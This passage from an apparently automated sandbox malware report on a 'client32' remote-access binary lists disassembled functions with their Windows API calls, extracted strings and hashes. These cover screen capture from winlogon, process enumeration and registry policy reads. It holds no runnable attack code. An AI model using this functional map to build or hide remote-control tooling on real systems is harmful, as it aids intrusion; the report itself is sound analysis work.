                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                • API String ID: 2071925733-2101319552
                                                                                • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • wsprintfA.USER32 ref: 1100553D
                                                                                • DeleteObject.GDI32(?), ref: 11005592
                                                                                • DeleteObject.GDI32(?), ref: 1100559B
                                                                                • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                • DeleteObject.GDI32(?), ref: 110055B8
                                                                                • DeleteDC.GDI32(?), ref: 110055BE
                                                                                • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                • DeleteObject.GDI32(?), ref: 110055D8
                                                                                • DeleteDC.GDI32(?), ref: 110055DE
                                                                                • DeleteObject.GDI32(?), ref: 110055EF
                                                                                • DeleteObject.GDI32(?), ref: 1100561A
                                                                                • DeleteObject.GDI32(?), ref: 11005638
                                                                                • DeleteObject.GDI32(?), ref: 11005641
                                                                                • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                • API String ID: 2789700732-770455996
                                                                                • Opcode ID: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                • Opcode Fuzzy Hash: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                Function 11015840 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BeginPaint.USER32(?,?), ref: 1101586F
                                                                                • GetWindowRect.USER32(?,?), ref: 11015887
                                                                                • _memset.LIBCMT ref: 11015895
                                                                                • CreateFontIndirectA.GDI32(?), ref: 110158B1
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110158C5
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 110158D0
                                                                                • BeginPath.GDI32(00000000), ref: 110158DD
                                                                                • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
                                                                                • EndPath.GDI32(00000000), ref: 11015907
                                                                                • PathToRegion.GDI32(00000000), ref: 1101590E
                                                                                • CreateSolidBrush.GDI32(?), ref: 11015920
                                                                                • CreateSolidBrush.GDI32(?), ref: 11015936
                                                                                • CreatePen.GDI32(00000000,00000002,?), ref: 11015950
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1101595E
                                                                                • SelectObject.GDI32(00000000,?), ref: 1101596E
                                                                                • GetRgnBox.GDI32(00000000,?), ref: 1101597B
                                                                                • OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
                                                                                • FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
                                                                                • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
                                                                                • DeleteObject.GDI32(00000000), ref: 110159C9
                                                                                • SelectObject.GDI32(00000000,?), ref: 110159D3
                                                                                • SelectObject.GDI32(00000000,?), ref: 110159DD
                                                                                • DeleteObject.GDI32(?), ref: 110159E6
                                                                                • DeleteObject.GDI32(?), ref: 110159EF
                                                                                • DeleteObject.GDI32(?), ref: 110159F8
                                                                                • SelectObject.GDI32(00000000,?), ref: 11015A02
                                                                                • DeleteObject.GDI32(?), ref: 11015A0B
                                                                                • SetBkMode.GDI32(00000000,?), ref: 11015A15
                                                                                • EndPaint.USER32(?,?), ref: 11015A29
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3702029449-0
                                                                                • Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                • Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
                                                                                • Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                • Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61
                                                                                Function 11003800 Relevance: 40.7, APIs: 27, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000004), ref: 1100385F
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1100387A
                                                                                • GetSysColor.USER32(00000010), ref: 1100388D
                                                                                • GetSysColor.USER32(00000010), ref: 110038A4
                                                                                • GetSysColor.USER32(00000014), ref: 110038BB
                                                                                • GetSysColor.USER32(00000014), ref: 110038D2
                                                                                • GetSysColor.USER32(00000014), ref: 110038F5
                                                                                • GetSysColor.USER32(00000014), ref: 1100390C
                                                                                • GetSysColor.USER32(00000010), ref: 11003923
                                                                                • GetSysColor.USER32(00000010), ref: 1100393A
                                                                                • GetSysColor.USER32(00000004), ref: 11003951
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 11003958
                                                                                • InflateRect.USER32(?,000000FE,000000FD), ref: 11003966
                                                                                • GetSysColor.USER32(00000010), ref: 11003982
                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003999
                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
                                                                                • LineTo.GDI32(00000000,?,?), ref: 110039C6
                                                                                • SelectObject.GDI32(00000000,?), ref: 110039D4
                                                                                • DeleteObject.GDI32(?), ref: 110039DE
                                                                                • GetSysColor.USER32(00000014), ref: 110039EC
                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003A02
                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
                                                                                • LineTo.GDI32(00000000,?,?), ref: 11003A35
                                                                                • SelectObject.GDI32(00000000,?), ref: 11003A43
                                                                                • DeleteObject.GDI32(00000000), ref: 11003A4A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                • String ID:
                                                                                • API String ID: 1903512896-0
                                                                                • Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                • Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
                                                                                • Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                • Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0
                                                                                Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,1B702977,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11138283
                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                • API String ID: 348974188-2591373181
                                                                                • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                Function 110EF8E0 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 110EF8FE
                                                                                • GetStockObject.GDI32(0000000F), ref: 110EF912
                                                                                • GetDC.USER32(00000000), ref: 110EF98A
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF99B
                                                                                • RealizePalette.GDI32(00000000), ref: 110EF9A1
                                                                                • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF9BC
                                                                                • SelectPalette.GDI32(00000000,?,00000001), ref: 110EF9D0
                                                                                • RealizePalette.GDI32(00000000), ref: 110EF9D3
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110EF9DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                • String ID:
                                                                                • API String ID: 1969595663-0
                                                                                • Opcode ID: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
                                                                                • Instruction ID: e17b5be7c9f279923d338761c599270f53c35d08167a1dd70bb196578b399fb7
                                                                                • Opcode Fuzzy Hash: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
                                                                                • Instruction Fuzzy Hash: 3471B2B2E41228AFDB04CFE5CC88BEEB7B9FF48705F044129F515E7244D674A9408BA1
                                                                                Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                • GdiFlush.GDI32 ref: 1105D35C
                                                                                • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                • API String ID: 652520247-4094952007
                                                                                • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                  • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                • wsprintfA.USER32 ref: 1102B84D
                                                                                  • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                                • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                • wsprintfA.USER32 ref: 1102B69E
                                                                                • wsprintfA.USER32 ref: 1102B705
                                                                                  • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                  • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
